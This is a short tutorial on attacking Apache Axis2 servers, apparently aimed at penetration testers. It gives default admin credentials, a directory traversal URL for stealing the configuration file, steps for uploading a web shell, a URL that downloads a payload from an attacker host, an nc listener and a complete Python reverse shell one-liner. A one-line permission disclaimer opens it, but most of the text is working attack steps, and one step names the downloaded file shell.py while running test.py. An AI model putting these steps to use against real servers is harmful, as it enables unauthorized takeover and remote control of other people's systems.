Disclaimer:
I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.
Prerequisites
For this exploit to work you must have:
- Valid admin console credentials
- Default = admin:axis2
- Public access to the admin console
- https://victim.com/axis2/axis2-admin
Discovery
There are a couple of ways to potentially find credentials for Axis2 servers. Some of these include: default credentials, weak credentials that can be brute forced, or outdated Axis2 servers. We will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file. This can be discovered using modules in Nmap and OpenVAS.
Nmap
$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2
OpenVAS
FYI
- There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
- The code can be found at Github.
- I have tried this exploit multiple times with no success.
Manual Validation
- Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will allow us to get the credentials. They should look like this:
- When you navigate to https://victim.com/axis2/axis2-admin/ it should give you the login portal.
<parameter name="userName">admin</parameter> <parameter name="password">axis2</parameter>
Create the Payload
A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
- Download the file
- Compile the file
- Modify $JAVA_HOME if necessary
- "ant -v" to build
Exploit
- Upload the AxisInvoker.aar service.
- Verify the deployment by checking the Deactivate or Activate service tab.
- Verify the shell works by running https://victim.com/axis2/services/AxisInvoker/exec?cmd=id
- Since stable shells are superior to web shells, we will improve to a stable shell. You will need to find what languages are on the system or use a system native option (like nc).
- Get a shell and modify it to your host machine.
- I usually get most of my shells from PentestMonkey
- Download your reverse shell from your webserver to the victim machine.
- https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
- Listen for the reverse shell by running "nc -nlvp 443".
- Execute your shell on the victim machine.
- https://victom.com/axis2/services/AxisInvoker/exec?cmd=python%20test.py
- After a few seconds, you should have a shell on your listener!
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
Hope that helps in your future pentests!